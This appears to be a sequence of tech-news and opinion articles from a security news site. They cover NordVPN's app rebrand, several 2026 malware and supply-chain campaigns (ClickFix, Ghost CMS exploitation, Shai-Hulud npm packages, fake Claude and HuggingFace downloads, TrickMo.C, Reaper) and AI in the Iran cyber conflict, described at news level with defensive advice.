The revamped NordVPN application is now organized around three core pillars: "connect," which refers to the virtual private network tech; "protect," where what's known as the Threat Protection suite becomes next-generation antivirus; and "monitor," which includes tools like Dark Web Monitor.

As Marijus Briedis, CTO at NordVPN, said in a press statement: "Such an approach reflects what users increasingly want from digital protection: stronger security, less complexity, and fewer separate tools to install and manage."

The need for a next-gen antivirus

The rebranding of Threat Protection features as next-generation antivirus capabilities is especially significant to grasp how the company is adapting to an online landscape where threats are diversified.

Many of today's most common and damaging digital dangers, including phishing pages, fake online stores, scam messages, and account takeover attempts, do not rely on downloadable files at all. Instead, modern cybercriminals use deception, compromised credentials, and social engineering to target unsuspecting users.

Yet, as Briedis explains, people still use the word 'antivirus' as a "shorthand" for digital security. "Modern protection should address the real risks people face online today, from phishing and scams to malicious downloads. Protection needs to evolve, without compromising the standard of privacy people expect from us," said Briedis.

Traditional antivirus software, in fact, has historically focused on reactive file scanning. NordVPN's next-generation antivirus aims to redefine this concept for private customers. It focuses on proactive, real-time protection to stop phishing, scams, ads, trackers, and malware before they ever reach a user's device.

Over the last year, we have tracked how NordVPN has steadily integrated broader defense features against online scams and malware. And these tools are already working hard. In April alone, NordVPN's next-gen antivirus tool blocked 4.8 million threats. Malware made up the majority of these blocks, accounting for over 3 million stopped threats.

Now, those extra layers of defense are taking center stage. A massive evolution for a service that already ranks among the best VPN options on the market.

Privacy-first security by design

One of the biggest concerns for users adopting all-in-one security suites is privacy. Antivirus software historically requires deep system access, which can raise surveillance concerns.

NordVPN claims its security approach is designed around collecting the minimum signal required to make a threat decision, avoiding turning security tools into surveillance products.

This privacy-first ethos extends across NordVPN's entire suite, from its core VPN capabilities to its dedicated machine learning models used to catch specific threat categories.

For users looking to streamline their digital setup, this rebrand also seeks to reduce the clutter of managing multiple subscription services.

"Consumers should not have to choose between convenience, protection, and privacy," says Briedis. "Our goal is to bring together advanced VPN technology and next-generation antivirus in one streamlined app experience that reduces complexity and better matches how people think about digital safety today."

This rebrand follows what has already been a highly active period for the provider; you can catch up on their other recent updates in our recap of everything NordVPN released in early 2026.

• Researcher finds Based Apparel site serving a macOS ClickFix infostealer disguised as a Cloudflare CAPTCHA check
• Victims were tricked into pasting malicious Applescript commands in Terminal, with VirusTotal flagging the malware as a commodity Trojan/infostealer
• The site, built on WordPress/WooCommerce and Ghost CMS, was taken offline after disclosure, linking the incident to broader Ghost CMS exploitation in ongoing ClickFix campaigns

Based Apparel, an American online clothing company selling patriotic, conservative, and pro–free speech-themed merchandise, was seemingly compromised and used to serve malware through the ClickFix technique - but only macOS users were targeted.

A researcher with the alias ‘debbie’ disclosed her findings to PC Mag, before sharing video proof on X, after saying she read online about Based Apparel being co-founded by FBI Director Kash Patel and decided to take a closer look.

“The ClickFix attack just kinda popped up when I was browsing it,” Debbie said in an email. “I took a quick look and it's just a classic infostealer, wrapped twice in base64 (binary-to-text encoding). It's interesting that it's written in Applescript though.”

Links to Ghost CMS?

The victims were asked to verify they were human, on a CAPTCHA page seemingly coming from Cloudflare. This spoofed Cloudflare site will tell the victim that “unusual web traffic” was detected, and will ask the victim to confirm they’re human by opening the Terminal and paste a command shared on the page.

Running the infostealer through VirusTotal, PC Mag found it was flagged by 27 antivirus engines as a Trojan and infostealer, meaning it’s commodity malware rather than a custom-built solution for targeted attacks.

Based Apparel is yet to comment, but its website is offline for the time being. At press time, the site showed a “We’ll be right back” message that stated the company is “making improvements”.

The website is seemingly built using two content management systems - WordPress with WooCommerce for the store functionality, and Ghost CMS for the separate news subdomain.

Earlier today, we reported that a critical-severity vulnerability in Ghost CMS, patched in February 2026, was also being abused against more than 700 domains to launch ClickFix attacks.

• Researchers warn CVE‑2026‑26980, a critical SQL injection flaw in Ghost CMS (score 9.4), is being exploited in a large ClickFix campaign
• Over 700 domains, including Harvard, Oxford, DuckDuckGo, and major AI/SaaS firms, were compromised to deliver malware via DLL loaders, JS droppers, and Electron‑based payloads
• Admins should urgently upgrade to Ghost 6.19.1 or later and monitor 30‑day admin API logs to detect potential compromise

A critical-severity vulnerability that reportedly was patched three months ago is being exploited in a massive ClickFix campaign, researchers have claimed.

In mid-February 2026, a critical SQL injection vulnerability was found in Ghost CMS, a popular open-source Content Management System (CMS) currently used by more than 57,000 websites, including the likes of 404 Media, The Canadian government, and Duolingo.

The flaw, tracked as CVE-2026-26980 and affecting Ghost 3.24.0 through 6.19.0, was assigned a severity score of 9.4/10 (critical), as it potentially allows unauthenticated attackers to perform arbitrary reads from the database, which grants management access to users, articles, themes, as well as article pages.

Deploying various malware

However, many users most likely did not patch, as Chinese cybersecurity firm Qianxin claims more than 700 domains were compromised to serve ClickFix attack flows.

Among them are Harvard University, Oxford University, Auburn University, DuckDuckGo, and many AI/SaaS company sites, media outlets, fintech firms, and others.

ClickFix is a type of scam in which attackers tell the victims they have a problem (which they don’t) and then provide the solution (which it really isn’t). The “solution”, however, just deploys a piece of malware, and depending on the attackers and the targets, it can vary from classic backdoors to ransomware encryptors.

In this campaign, the researchers saw DLL loaders, JavaScript droppers, and a generic Electron-based malware being distributed.

The best way to mitigate the threat is to simply upgrade the Ghost CMS either to version 6.19.1, or whatever the latest version is at the moment. Website owners are also advised to keep a 30-day record of admin API call logs, just to keep track of potential compromise.

Via BleepingComputer

At the end of April, the Internet Corporation for Assigned Names and Numbers (ICANN) opened the application period for domain registrars, to allow companies to register for .BRAND domains for the first time since 2012, allowing organizations to register a new generic top-level domain (gTLD) that matches their trademarked name.

“Top level” refers to what is typically the “.com,” “.net,” “.gov,” etc. part of a domain. A .BRAND instead features a brand name after the final dot in a domain address, such as https://about.google.

As a custom domain extension, it is owned and operated by the business that holds the trademarked name.

With this, companies take full control over their domain ecosystem by creating, managing and deactivating domains quickly without third-party assistance.

This means .BRANDS are about much more than a name. The current application period marks a fresh opportunity to future-proof digital assets by carving out a trusted space for company information and partner interactions. Such trust is needed because emerging AI tools are triggering increasingly sophisticated cyber attacks and brand infringements by targeting domains.

Nine out of ten organizations, in fact, have experienced at least one domain name system (DNS) attack, with a $1.1 million average cost per incident. Executive leaders must reassess how to best prepare their own internal, partner and customer infrastructures for the new era of digital threats.

The great promise of dot BRANDS

Dot BRANDS bring great promise to help companies achieve this. They bolster domain security against phishing and other types of fraud by mitigating the incidence of lookalike domains. At the same time, they boost brand visibility and placement in search results and AI-generated responses alike.

There are more than 400 .BRANDS in global web ranks, including dns.google, home.barclays and group.softbank. To cite one use case example, Microsoft is consolidating Microsoft 365 apps and services under the cloud.microsoft domain. Subsequently, businesses significantly improve domain protection with the following advantages:

1. ICANN Specification 13 ensures that a .BRAND domain is exclusively reserved for the trademark holder, eliminating third-party use of the domain.

2. An official .BRAND enables full traceability and consistency for domain-associated sites, assuring authenticity for any hosted website linked to it.

3. By operating in this exclusive namespace, organizations reduce exposure to lookalike domains commonly used in phishing, malware and impersonation schemes. As a result, a .BRAND fortifies security, limiting financial and reputational risks.

4. Users readily distinguish fraud domains from real ones because a .BRAND establishes clear authenticity, a company-controlled online space and, thus, customer trust. What’s more, a .BRAND domain is automatically disassociated from the brand if the content/information cannot be traced to the organization.

Fueling reliable AI/LLM results

This means businesses can say with confidence, “If it doesn’t end in our .BRAND domain, then it’s not us.” Such confidence extends to the ubiquity of AI/large language models (LLMs) in multiple ways.

For starters, .BRANDs create a future-ready, controlled TLD infrastructure with a secure foundation for emerging technologies like AI and LLMs. Because the brand exclusively owns and operates the TLD, every domain published under it is inherently authenticated, giving AI systems a clean, unambiguous signal of origin when crawling and sourcing content.

An organization’s domain ecosystem plays a major role in influencing whether AI tools will use its content as a source. In gathering information to generate responses, LLMs and AI search engines increasingly rely on digital signals that are verified and contain reliable content, not those that appear to be fraudulent and/or contain inaccurate information. An ability to identify legitimate sources plays a crucial role here, especially given the wealth of AI-generated misinformation out there.

By definition, content hosted on a .BRAND website is verifiable and authentic. It would not exist if not for the indisputable confirmation associated with a legitimate organization. Beyond security, this establishes a strong signal for AI search results/response rankings, with .BRANDs emerging as machine-readable trust signals to optimize algorithmic rankings.

Seizing a rare domain opportunity

A .BRAND is not a short-term marketing initiative; it is a long-term strategic position. It is distinctive, secure and easily identifiable as authentic by both humans and machines – delivering a decided, competitive advantage in the AI race. Indeed, a .BRAND indicates that your company is considered a market leader focused on innovation, with a lasting commitment to domain defense, brand control and digital strategy.

That said, pursuing a .BRAND is a significant undertaking. Applicants must hold a registered trademark for the desired extension, and the costs are considerable. These .BRANDs are most viable for larger organizations with legally defensible brand names and the resources to transition to and maintain a TLD long-term. For those that qualify, however, the investment secures a level of digital ownership that no other domain strategy can match.

It’s been 14 years since the last application window opened, and there may not be another opportunity in the foreseeable future after the current one closes on August 12 this year. Therefore, executive leaders should seize the moment to assess whether now is the time to ensure greater control over their brand’s digital identity – and position their organization as forward-thinking and authoritative.

We feature the best website builders.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• GitHub confirms an employee’s compromised device led to exfiltration of internal repositories via a poisoned VSCode extension
• Threat actors TeamPCP are selling an archive of roughly 4,000 repos on the dark web, asking $50,000 with samples shared for proof
• The group is also behind recent npm supply‑chain attacks, highlighting its ongoing campaign against developer ecosystems

GitHub, one of the biggest open source code repositories in the world, has confirmed being hit by a cyberattack which saw its sensitive data stolen.

In a short announcement on X, GitHub saidone of its employees had their device compromised when they downloaded a poisoned VSCode extension.

The company removed the malware, isolated the endpoint, and started an investigation, which determined the attacker exfiltrated some sensitive data.

TeamPCP takes the blame

“Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only,” Github noted. “The attacker’s current claims of ~3,800 repositories are directionally consistent with our investigation so far.”

In response, GitHub rotated critical secrets and continues to analyze logs, validate secret rotation, and monitor follow-on activity. “We will take additional action as the investigation warrants,” it concluded.

An archive of roughly 4,000 repositories is reportedly being offered for sale on the dark web, by threat actors known as TeamPCP, with CyberInsider claiming the group is asking for $50,000 in exchange for the archive, but apparently, no ransom note was left.

“There is a total of around ~4,000 repos of private code here,” the crooks allegedly said. They also shared samples, to prove the authenticity of their claims. If no one buys the stash soon, the attackers said they would leak it to the dark web for free.

Besides ShinyHunters, TeamPCP is currently one of the most active groups out there. It is responsible for Shai-Hulud and Mini Shai-Hulud campaigns, in which they compromised countless GitHub and npm repositories, and used them to push malware to possibly thousands of projects.

It recently published more than 600 malicious packages to the npm registry, targeting more than 300 unique packages. By stealing login credentials and access tokens, the miscreants access legitimate packages and update them to push infostealer malware, grabbing credentials, and compromising CI/CD environments.

From our energy infrastructure, through to the systems responsible for our telecommunications, transport and utilities, a core set of services are essential to keeping our society running.

World events have rightly put Britain’s defense capabilities under renewed attention, but our national sovereignty is maintained just as much by the cyber resiliency of these critical systems as much as it is by nuclear deterrents, submarines and physical military hardware.

Operational Technology (OT) systems control power generation, transmission, distribution and gas transport safely and reliably. The increasing digitization and connection of these systems is seeing cyber risk emerge, whether it’s from the exploitation of unpatched vulnerabilities, phishing, or malware attacks.

Launched by nation-state groups, or criminal elements employed as proxies, they are among the most significant threats to the industry, as they hope to trigger knock-on effects and cause severe disruption to everyday life.

A combination of internal gaps in strategy, cybersecurity capabilities, and outdated technology, is leaving our energy grid vulnerable. Once compromised, the intention with many of these actors is to persist and maintain a presence within these systems, learning and capturing as much information as they can over time without being detected.

Automation is on their side, lowering the barrier to entry in getting attacks off the ground for opportunistic and commercially-motivated groups, as well as enabling further adaptation and evolution of malware. There are also risks with AI as it becomes embedded into enterprises.

Thales’ recent Data Threat Report, for example, found 61% of organizations globally rank AI as their top data security threat, as these automated systems are increasingly granted broad access to enterprise data.

Operational simulation to validate cyber resilience

The scale and frequency of these risks underscore the importance of planning and simulating responses in as much detail as possible, and to this end, digital twins have become an increasingly popular tool in many industrial sectors.

Linking to data gathered from a target environment, it allows for the creation of a perfect digital representation of a real object or process.

It’s here that cyber risk must be considered alongside engineering and operational risk, with governance frameworks that make sure cybersecurity supports wider safety and operational security.

As part of the validation, leaders also need to ensure that personnel can respond safely and effectively during incidents.

By working in a sandboxed environment, security teams responsible for critical energy networks can model attacks from ransomware outbreaks to insider attacks without risking downtime or data loss.

Ongoing testing and validation ensure security controls remain effective as systems evolve, because networks are continuously evolving. New assets are deployed, systems are upgraded, and operational requirements change - meanwhile resilience must be continuously maintained.

Going a level further, the operators of power grids, rail networks and water suppliers are often managing their digital and physical assets independently.

If we can integrate these various digital twins together, decision makers can suddenly see a shared, simulated and real-time model of the entire system, allowing for impact analysis should a problem emerge.

A unified national response to cyberattacks

Adequately addressing cyber risk to critical infrastructure also requires a cultural shift in how these organizations deal with and react to the data about the attacks they face.

With priority given to confidentiality and secrecy, it means this is often hoarded and kept within a given organization, meaning each sector is left to deal with problems in isolation.

Threat actors know this and are keen to exploit it – after all, threats do not respect organizational boundaries. They’re moving at machine speed, while defense often moves at the speed of bureaucracy.

Whether it was successful or not, each unreported attack is a missed opportunity to refine security strategies, share knowledge, and enhance the overall resilience of the sector. Critical national infrastructure operators and suppliers must collaborate closely to identify and close these security blind spots.

From information silos to networked intelligence

Building and sharing more of these capabilities across sectors puts us in a position where if a new malware signature is detected by one utility company, everyone else, from transport to defense and energy, can be immunized against that threat within milliseconds.

Mandated incident reporting, as the UK Government proposes for high-risk sectors and essential infrastructure, is a welcome move in the right direction.

Ofgem, the UK’s energy regulator, meanwhile, has strengthened its expectations around cyber resilience, shifting its emphasis from compliance to demonstrable operational capability and preparedness.

At CYBER UK this year, we talked a lot about how no single sector can meet this challenge in isolation. Critical infrastructure, public services, and private enterprises alike are all connected by digital ecosystems – and associated cyber risks.

Building shared resiliency into critical infrastructure is an imperative for our wider national sovereignty and security. It will take structural changes, from proactive security measures through to cultural shifts, to ensure our cyber expertise is up to the task of meeting what lies ahead.

We've featured the best encryption software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• Microsoft disrupts Fox Tempest operation which abused Azure Artifact Signing to issue fraudulent code‑signing certificates
• The group created over 1,000 certificates and hundreds of Azure tenants, enabling malware campaigns to bypass security controls
• Legal action was launched against Fox Tempest and Vanilla Tempest, whose services supported major malware and ransomware distribution

Microsoft has taken down a malicious service that offered digitally signed certificates to hackers, and has launched a legal case against the operation’s perpetrators.

In its report the company said a threat actor known as Fox Tempest used Azure Artifact Signing to create temporary certificates. These certificates allowed malware to be signed as legitimate software, bypassing antivirus protections and compromising victim devices.

To access the service, the miscreants allegedly used different identities, stolen from people in the United States and Canada. To minimize the chances of being spotted, they created certificates that were only valid for 72 hours - however, during their work, the attackers created more than 1,000 certificates, as well as hundreds of Azure tenants and subscriptions.

High-profile customers

"Fox Tempest has created over a thousand certificates and established hundreds of Azure tenants and subscriptions to support its operations. Microsoft has revoked over one thousand code signing certificates attributed to Fox Tempest," Microsoft said in the report.

"In May 2026, Microsoft's Digital Crimes Unit (DCU), with support from industry partners, disrupted Fox Tempest's MSaaS offering, targeting the infrastructure and access model that enables its broader criminal use."

As part of the takedown effort, Microsoft seized the signspace[dot]com domain, as well as hundreds of virtual machines. It also blocked access to infrastructure that hosted the entire service.

BleepingComputer notes some of the biggest malware and ransomware campaigns used Fox Tempest’s services, including LummaStealer, Vidar, Qilin, BlackByte, and Akira. Vanilla Tempest was named as a co-conspirator in the legal action, it was further stated, since it allegedly distributed both malware and ransomware.

Some of the fake apps being distributed this way included Teams, AnyDesk, and Webex.

"When unsuspecting victims executed the falsely named Microsoft Teams installer files, those files delivered a malicious loader, which in turn installed the fraudulently signed Oyster malware and ultimately deployed Rhysida ransomware," Microsoft explained.

“Because the Oyster malware was signed by a certificate from Microsoft's Artifact Signing service, the Windows operating system initially recognized the malware as legitimate software, when it would otherwise be flagged as suspicious or blocked entirely by security controls in the Windows operating system."

• More than 600 malicious npm packages were published in a coordinated supply‑chain attack linked to TeamPCP’s Shai‑Hulud campaign
• The attackers compromised ecosystems including TanStack, Mistral, and antv, introducing infostealers and persistence mechanisms in developer environments
• Developers are advised to roll back to safe versions released before May 18 and rotate any exposed credentials

Cybercriminals published more than 600 malicious packages to the npm registry in a coordinated software supply-chain attack linked to the Shai-Hulud campaign.

Multiple security organizations, including Socket, confirmed that on May 19 2026, in just one hour, malicious actors managed to publish 639 versions of 323 unique packages on npm, targeting software developers, open-source maintainers, organizations running CI/CD pipelines, and everyone else who downloaded, or depends, on the compromised npm packages.

Shai-Hulud is a malware campaign conducted by a threat actor known as TeamPCP. By stealing login credentials and access tokens, the miscreants access legitimate packages and update them to push infostealer malware, grabbing credentials, and compromising CI/CD environments.

Major downstream risk

So far, TeamPCP compromised an undisclosed number of npm packages, but we know that at least some of them are from TanStack-related and Mistral-related ecosystems - with OpenAI one of the companies that confirmed suffering exposure as a result of the Shai-Hulud campaign.

In the latest attack, the threat actors targeted the antv ecosystem, into which thousands of GitHub repositories were later automatically created using stolen credentials. The campaign also introduced fake-looking package provenance signatures and new persistence mechanisms targeting VS Code and Claude Code environments.

The report does not say how many times the malicious package versions were actually downloaded, but it does stress the normal popularity of some affected packages. For example, the jest-canvas-mock package gets around 10 million monthly downloads, which suggests that the attack surface is extremely large.

Security researchers stressed that the full impact of the campaign is not yet known, mostly because we don’t know the number of downstream infections. However, supply-chain attacks like this one can be particularly dangerous, as just one compromised maintainer account can affect thousands of projects through automated package updates.

Developers who downloaded infected packages should remove or roll back to safe versions published before May 18, as well as rotate any potentially exposed credentials.

Via BleepingComputer

• SentinelOne uncovers new SHub macOS infostealer variant dubbed Reaper, spread via typosquatted WeChat and Miro domains
• The malware disguises itself with fake Apple and Google update components, establishing persistence and backdoor access
• Reaper targets browser credentials, crypto wallets, password managers, and sensitive documents, with signs of Russian‑speaking operators avoiding CIS systems

Cybersecurity researchers from SentinelOne have discovered a new variant of the notorious SHub macOS infostealer malware called ‘Reaper’.

In a new report SentinelOne said it observed typosquatted domains spoofing popular apps WeChat (a popular Chinese messaging and social media app) and Miro (an online visual collaboration and whiteboard platform).

Victims using macOS and looking to install these apps will trigger an infection chain that constantly changes its disguise to make the malware look legitimate at every stage of attack. After launching the script, it will display a fake update message referencing Apple’s XProtectRemediator security tool, and after infecting the system, it will establish persistence by creating files and folders designed to look like a genuine Google software update component.

Avoiding the Russians

It will store a backdoor in a fake “GoogleUpdate” directory and register a LaunchAgent named “com.google.keystone.agent.plist,” the researchers said.

The goal of the campaign is to steal credentials and sensitive files, as well as cryptocurrency wallets. While SentinelOne does not attribute the attack to any specific group or threat actor, it did say there were several hints suggesting the operators may be Russian speaking (or are, at least, trying to avoid targets in former Soviet states).

The malware checks whether the infected system uses Russian input sources and exits if it detects systems in the CIS (Commonwealth of Independent States) region. SentinelOne also said that when they tried to bypass the malware’s anti-analysis protection, a fake website displayed a Russian “Access Denied” message.

The Reaper variant primarily targets web browsers, cryptocurrency wallets, and applications that may contain financial or business-related data, stealing browser credentials, crypto wallet data, login keychains, Telegram session data, and documents from the Desktop and Documents folders.

It also searches for browser extensions linked to password managers such as 1Password, Bitwarden, and LastPass, along with cryptocurrency wallets like MetaMask and Phantom.

• ThreatFabric spotted new TrickMo.C variant targeting Android users in Europe
• Disguised as TikTok/streaming apps, it steals credentials, intercepts SMS, suppresses OTPs, and enables live surveillance
• Victims are mostly situated in France, Italy and Austria

Android users across Europe are being targeted with a new variant of a decade-old banking trojan, researchers have revealed.

ThreatFabric has explained how it has been tracking a banking trojan called TrickMo.C, since January 2026.

TrickMo is an Android banking trojan that was first spotted in September 2019, but since then has been in active development, constantly receiving upgrades and new features. By 2024, there were more than 40 TrickMo variants in existence, being delivered through more than a dozen droppers, and communicating with 22 separate command-and-control (C2) infrastructures.

Extracting secrets from the French, Italians, and Austrians

This latest version is being disguised as TikTok and streaming apps. The exact deployment mechanism is unknown, but it’s safe to assume the crooks are advertising it on third-party app repositories, on Telegram and social media channels, as well as through phishing and SEO poisoning.

When installed on the target device, TrickMo.C creates a phishing overlay through which it can harvest login credentials and other valuable secrets. It can also log keys, taps, and strokes, record the screen, livestream the contents directly to the attackers, and intercept SMS messages. It can suppress OTP notifications, modify the users’ clipboard, filter notifications, and send screenshots.

All of this allows the attackers to steal credentials, log into people’s bank accounts and crypto wallets, make payments and wire transfers, while keeping the victims entirely in the dark. The victims are mostly located in France, Italy, and Austria, it was said.

What makes TrickMo.C stand out compared to previous versions is that it communicates with its operator via TON, a decentralized peer-to-peer network originally developed around the Telegram ecosystem. Instead of using publicly exposed servers, users communicate with the web through an encrypted overlay network.

The operators use ADNL addresses routed through an embedded local TON proxy that runs on the infected endpoint.

• Attackers weaponized a .jpeg file to deliver PowerShell payloads, trojanized ScreenConnect, and establish persistence
• The malware enables credential theft, encrypted C2 comms, and surveillance features
• Cyfirma warns the campaign reflects a mature intrusion framework

Be careful when downloading files from the internet, as even innocent .jpeg files can actually contain malware, experts have warned.

Security researchers Cyfirma published an in-depth report on a brand new hacking campaign they named “Operation SilentCanvas”. While we don’t know the number of infections, or successfully compromised victims, the researchers said the campaign likely targets enterprises and other organizations using remote administration tools.

The attack starts when the victim receives the weaponized .jpeg file. Again, we don’t know the exact delivery mechanism, but Cyfirma speculates the file is delivered either via phishing emails with malicious attachments, deceptive file-sharing interactions, or fake software and update lures.

"Professionally engineered and operationally mature intrusion framework"

In any case, when the victim runs the file, named ‘sysupdate.jpeg’, it actually executes a malicious PowerShell payload which does a number of things: it downloads additional payloads from the attacker’s infrastructure; deploys a trojanized version of ConnectWise ScreenConnect for covert remote access; bypasses Windows security protections and elevates privileges by adding malicious Registry entries; and establishes persistence via a fake Windows service named OneDriveServers.

The malware also enables encrypted communications with the command-and-control (C2) infrastructure, steals credentials, and fingerprints the system. Other supported features include screen capture, microphone capture, and clipboard monitoring.

“The overall tradecraft reflects a professionally engineered and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments,” Cyfirma concluded, without naming the group, or even linking it to a specific country, or region.

To defend against this campaign, security experts should keep an eye on commonly abused Windows binaries, including csc.exe, cvtres.exe, or ComputerDefaults.exe. If possible, these should be blocked entirely. Remote access platforms should be strictly controlled, and detection rules for suspicious PowerShell behavior set up.

Finally, any system that displays unexpected ScreenConnect activity should be sealed off immediately.

• Attackers typosquatted an OpenAI repo on HuggingFace, distributing an infostealer disguised as a “privacy filter” model
• The malware disabled SSL checks, escalated privileges, and deployed the sefirah payload to steal credentials, crypto wallets, and system data
• The fake repo hit 244,000 downloads and briefly topped HuggingFace rankings before removal, with other linked malicious repos also taken down

Cybercriminals were able tp spoof OpenAI products to distribute an infostealer malwar to more than 240,000 computers before being spotted and eliminated, experts have warned.

Security researchers HiddenLayer said they spotted a new repository on HuggingFace called Open-OSS/privacy-filter.

The privacy filter repository is, according to HiddenLayer, a typosquatted version of the official release, which came with a model card that was copied “nearly verbatim”. The loader.py file that was shipped in it fetches and executes an infostealer, they added.

Rising to the top

Before dropping the infostealer, the malware first disabled SSL verification, decoded a base64 URL, and from it downloaded a JSON payload with a PowerShell command. This command, in turn, downloaded a batch file that escalated privileges, deployed the ‘sefirah’ payload, added it to Microsoft Defender’s exclusion list, and then ran it.

The infostealer itself does what most infostealers do - grabs data saved in browsers, exfiltrates discord tokens, local databases, and master keys, steals cryptocurrency wallet information, browser extension data, SSH, FTP, VPN credentials, as well as sensitive files stored locally. It can also grab screenshots, exfiltrate system information, and more.

The download count on the fake repository is massive - 244,000 downloads in mere days.

However, this doesn’t mean every download led to an infection. BleepingComputersays the download numbers may have been inflated, and that the repository itself was “liked” by 667 auto-generated accounts. Still, even if it was all fake, the repository still managed to hit #1 on Hugging Face for a brief moment, which definitely could have lead to infections.

However, by following the trail of the fake accounts, HiddenLayer was able to expose other, less-successful repositories, which were also malicious and used the same infrastructure. All of these have since been removed from the platform.

• Attackers exploited a CMS flaw to replace Windows and Linux installer links with malware‑laden versions between May 6–7, 2026
• The poisoned installers deployed a Python‑based RAT via a loader, while other distribution channels (macOS, JAR, Snap, etc.) remained safe
• AppWork advises verifying digital signatures (“AppWork GmbH”) to avoid tampered builds; the site has since been secured

Popular download manager JDownloader recently had its website hacked and hijacked to deploy malware to Windows and Linux users.

As explained by owner AppWork, unidentified attackers found a vulnerability in the website’s content management system (CMS), and used it to swap out the download links for a pair of variants:

"Changes were made through the website's content management system, affecting published pages and links," AppWork said in its incident report. "The attacker did not gain access to the underlying server stack — in particular no access to the host filesystem or broader operating-system-level control beyond CMS-managed web content."

Checking the digital signature

Anyone who clicked on the alternative Windows installer download links, or the Linux shell installer link, between May 6 and May 7, 2026, was redirected to a third-party server hosting a malicious version of the software. This version was poisoned to include a loader that deployed a heavily obfuscated Python-built Remote Access Trojan (RAT).

Other downloads, including in-app updates, macOS downloads, Flatpak, Winget, Snap packages, and the main JDownloader JAR package were not tampered, AppWork confirmed.

It also said the best way to make sure you’re using the right installer is to double-check its digital signature. That can be done by right-clicking on the executable, navigating to Properties, and then the Digital Signatures tab. The program needs to show it was signed by “AppWork GmbH”, otherwise it’s definitely malware.

On Reddit, users who downloaded the tainted versions saw the developer being listed as 'Zipline LLC,' and 'The Water Team'. Luckily enough, Windows Defender flagged the program as malicious, protecting the users.

The website was temporarily turned off, allowing the company to plug the hole and clean up the links.

Via BleepingComputer

• A spoofed site (claude-pro[.]com) delivers poisoned installers that sideload DonutLoader and the Beagle backdoor
• The operation mimics legitimate Claude software, likely tied to PlugX operators using DLL sideloading
• Researchers warn of malicious ads and SEO poisoning, urging users to verify links before downloading

If you’re looking to download the Claude client on Windows, be careful, because there are fake and malicious versions out there looking to exploit interest in new AI models.

Security researchers from Sophos have flagged how one such alleged Claude Pro offering led them to a website “claude-pro[.]com”. The site itself was built to look identical to the legitimate claude.ai official website, but the researchers determined it was fake rather quickly, as none of the links or buttons on the site, aside from the download one, worked - all redirecting back to the homepage.

Those who didn’t spot the scam, and clicked the download button, would end up with a working version of Claude - however, one which had been poisoned to also deliver an updater, and a DLL file. In classic DLL sideloading fashion, the updater runs the malicious DLL which, in turn, deploys a loader malware called DonutLoader.

Dropping Beagle

This tool, in turn, fetched a “relatively simple backdoor” called Beagle, capable of running commands, uploading and downloading files, creating directories, uninstalling agents, and more.

Sophos could not attribute this campaign to any particular threat actor, but they did say that it was most likely operated by the same people who are running PlugX.

PlugX is a remote access trojan (RAT) usually used by Chinese state-linked threat groups to spy on victims, steal data, and maintain persistent access to compromised systems. The malware is described as being highly adaptable and modular, allowing attackers to execute commands, capture screenshots, log keystrokes, and move laterally across networks. It has been active for more than a decade and is one of the longer-running RATs out there.

The attackers most likely planned to run malicious ads and SEO poisoning to reach their targets, so make sure to double-check the links in your search engine before visiting any websites.

The Iran conflict is serving as an AI testbed for the next era of cyber conflict. Most organizations are watching the tactics and impact unfold with cybersecurity defenses that are simply not prepared for this level of sophistication.

Meanwhile, technology leaders are seeing AI as both their biggest opportunity and a major new attack vector. Despite this recognition of AI as both notable ally and foe, only one in five CIOs feels highly effective at defending against AI-enabled adversaries.

Concurrently, state-backed groups on all sides are already using AI-enhanced tooling to run highly targeted phishing attacks, moving quickly through networks and hitting critical IT infrastructure.

Put simply, the AI-powered cyber arms race has moved beyond the theoretical and well into a live-testing phase, in a real conflict zone.

Cyber as the first mover

Cyber operations are now an intrinsic part of warfare. US commanders have called cyber and space units the “first movers”, used to blind Iranian systems, cut communications, and shape the battlefield before and during airstrikes.

According to LevelBlue’s analysis, large DDoS attacks, deep hacks into energy and telecoms and manipulation of mobile apps drove Iran’s internet connectivity down to about 4% of normal during the first waves of strikes. It’s clear is that cyber can no longer be thought of as a passive defense tactic.

The same dynamics can now be seen mirrored in Iran’s response. Iranian APTs (Advanced Persistent Threats) like MuddyWater, Charming Kitten, OilRig and Elfin have shifted from quiet pre-positioning to more aggressive cyberattack campaigns, using AI-assisted tooling like GhostFetch and RustyWater.

These AI tools automate scouting, create convincing phishing lures and spread quickly through networks. Business leaders are learning in real time that in a crisis, cyber strikes hit first to blind, confuse decisions and set the scene for future attacks.

If their organization is unable to detect and respond to said strikes at machine-speed, they are already two steps behind.

The reality of AI-accelerated attacks

The ongoing Iran conflict offers a concrete preview of how AI and cyber tactics will interact in future conflicts. War has moved off the battleground onto computer screens and lines of code.

On the offensive side, AI helps sift open-source intelligence, satellite images and telemetry to spot targets faster. This is in line with what US officials have hinted at when talking about “finding and fixing” Iranian military assets.

On the defensive and retaliatory side, Iranian hackers and proxies use AI for scale. This includes hyper-personalized phishing against policymakers and NGOs, automated credential theft and password spraying, in addition to wiper malware hitting factories and hospitals to maximize chaos.

Such attacks are blurring the lines between “activists” and states. Groups using hacktivist-style names, like Handala, are carrying out destructive data-wiping and data-leaking operations that in reality look and feel like government-backed campaigns. However, whether it’s a lone hacker or a nation-state, the impact on a business is the same.

What IT leaders need to know

As the cyberthreat landscape increases in complexity and sophistication amidst ongoing geopolitical conflict, CIOs, CTOs and business leaders in general need to take actionable steps to get prepared:

Firstly, every business leader should assume that AI-driven tradecraft will be used against their organization, whether or not that business is a direct party to a geopolitical dispute. Threat intelligence reports show spillover activity across sectors and regions as Iranian and allied groups probe for soft spots in energy, finance, healthcare and aviation networks beyond the conflict zone.

US medical-device company Stryker has already fallen victim to a state-backed cyberattack. Across the pond, the UK’s National Cyber Security Centre has also urged firms to strengthen their defenses amid the conflict. Therefore, the traditional “we’re not a likely target” thinking is rendered moot and dangerously outdated.

Secondly, investment in AI should be deliberate rather than reactive, to match attackers’ use of AI. Most leaders are now investing in AI for threat detection and faster response, while embedding cyber resilience across the business. The Iran conflict is actively demonstrating why this priority shift cannot wait.

